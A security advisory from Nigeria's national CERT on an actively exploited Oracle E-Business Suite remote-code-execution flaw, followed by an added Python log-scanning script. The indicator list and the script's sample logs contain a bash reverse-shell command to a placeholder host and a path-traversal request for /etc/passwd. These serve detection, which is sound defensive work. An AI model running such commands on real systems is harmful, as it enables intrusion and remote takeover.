Monday November 03, 2025

Advisory ID:   ngCERT-2025-100005

SUMMARY

ngCERT has detected a critical and easily exploitable vulnerability affecting the Oracle E-Business Suite (EBS) in Nigeria. This vulnerability, assigned CVE-2025-61882, could be exploited remotely by an unauthenticated attacker with network access via HTTP to achieve remote code execution (RCE), potentially leading to full system takeover. Assigned a CVSS 3.1 base score of 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group; hence, it has been listed in CISA's Known Exploited Vulnerabilities (KEV) Catalogue. There is therefore an urgent need for organisations to update applications and apply patches to safeguard against exploits and possible cyberattacks.

Damage:      Critical (CVSS 3.1 Base Score 9.8)

Probability:  High

Platform(s):  Oracle E-Business Suite

DESCRIPTION

CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses, including inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection, and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access crafts malicious HTTP requests to exploit these flaws. The attack begins by leveraging inconsistent request parsing and path traversal to access restricted server resources. By injecting crafted XML payloads, the attacker exploits XXE and XML injection vulnerabilities to manipulate server-side processing. CRLF injection escalates the attack by injecting malicious headers, enabling SSRF to trigger unauthorised server requests. This chain culminates in RCE, allowing the attacker to execute arbitrary commands on the server without authentication.

CONSEQUENCES

Successful exploitation of these flaws could result in:

    1. Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
    2. Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
    3. Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
    4. Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
    5. Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.

SOLUTION/MITIGATION

To mitigate these vulnerabilities, ngCERT recommends the following measures:

    1. Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
    2. Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
    3. Monitor and Detect: Actively monitor logs for indicators of compromise (IOCs), such as IP addresses (e.g., 200.107.207.26 and 185.181.60.11), commands (e.g., sh -c /bin/bash -i >& /dev/tcp/ / 0>&1), or file hashes (e.g., SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d).
    4. Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
    5. Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
    6. Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.
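As an added illustration of the "Monitor and Detect" recommendation above (this is example code written for this page, not tooling from ngCERT or Oracle), the script below sweeps constructed access-log and process-record lines for the indicators the advisory lists: the two source IP addresses, the reverse-shell command fragment, and the SHA-256 file hash. The log line formats, the sample lines, the file paths and the host/port inside the sample reverse-shell command are all assumptions made for the example; only the IPs, the command shape and the hash come from the advisory. Because the advisory elides the host and port of the reverse shell, the command pattern matches any /dev/tcp/<host>/<port> redirection rather than a single address, and it also flags decoded "../" sequences in request paths since path traversal is the first step of the described chain.

```python
"""Sweep log lines for the CVE-2025-61882 indicators listed in ngCERT-2025-100005.

Added example for this advisory page; not ngCERT's or Oracle's own tooling.
Log formats and sample lines are constructed assumptions.
"""
import hashlib
import re
from urllib.parse import unquote

# Indicators quoted in the advisory.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {"76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"}

# The advisory gives the command as "sh -c /bin/bash -i >& /dev/tcp/ / 0>&1"
# with host and port elided, so match any host/port in that position.
IOC_CMD_RE = re.compile(r"/bin/bash\s+-i\s+>&\s*/dev/tcp/[^/\s]+/\d+\s+0>&1")

# Assumed access-log shape (constructed):
#   <client_ip> - - [timestamp] "<METHOD> <path> HTTP/1.1" <status>
ACCESS_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/'
)

# Constructed sample input; the paths are placeholders, not real EBS endpoints.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [03/Nov/2025:09:12:01 +0100] "GET /app/login HTTP/1.1" 200',
    '200.107.207.26 - - [03/Nov/2025:09:13:44 +0100] "POST /app/report HTTP/1.1" 200',
    '10.0.0.7 - - [03/Nov/2025:09:14:02 +0100] "GET /app/..%2f..%2fetc/passwd HTTP/1.1" 404',
]

# Constructed process-record lines (e.g. from a periodic "ps" audit on the EBS host).
SAMPLE_PROCESS_LOG = [
    "pid=4120 user=applmgr cmd=java -jar /example/concurrent.jar",
    "pid=4133 user=applmgr cmd=sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
]


def scan_access_log(lines):
    """Return (line_no, reason) for lines from listed IPs or with traversal paths."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not in the assumed format; a real deployment would log this
        if m.group("ip") in IOC_IPS:
            hits.append((no, f"request from advisory-listed IP {m.group('ip')}"))
        # Decode percent-encoding first so "..%2f" is caught as well as "../".
        if "../" in unquote(m.group("path")):
            hits.append((no, "path traversal sequence in request path"))
    return hits


def scan_process_log(lines):
    """Return (line_no, reason) for command lines matching the reverse-shell IOC."""
    return [
        (no, "reverse-shell command matching advisory IOC")
        for no, line in enumerate(lines, 1)
        if IOC_CMD_RE.search(line)
    ]


def digest_is_ioc(hexdigest):
    """True if a SHA-256 hex digest (any case) is one the advisory lists."""
    return hexdigest.strip().lower() in IOC_SHA256


def file_bytes_are_ioc(data):
    """Hash file contents and compare against the advisory's SHA-256 list."""
    return digest_is_ioc(hashlib.sha256(data).hexdigest())


if __name__ == "__main__":
    for no, reason in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"access log line {no}: {reason}")
    for no, reason in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"process log line {no}: {reason}")
```

Run against real logs, the IP and hash checks are exact matches and produce no false positives; the traversal and reverse-shell patterns are broader and are meant to raise events for triage, not to block on their own.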
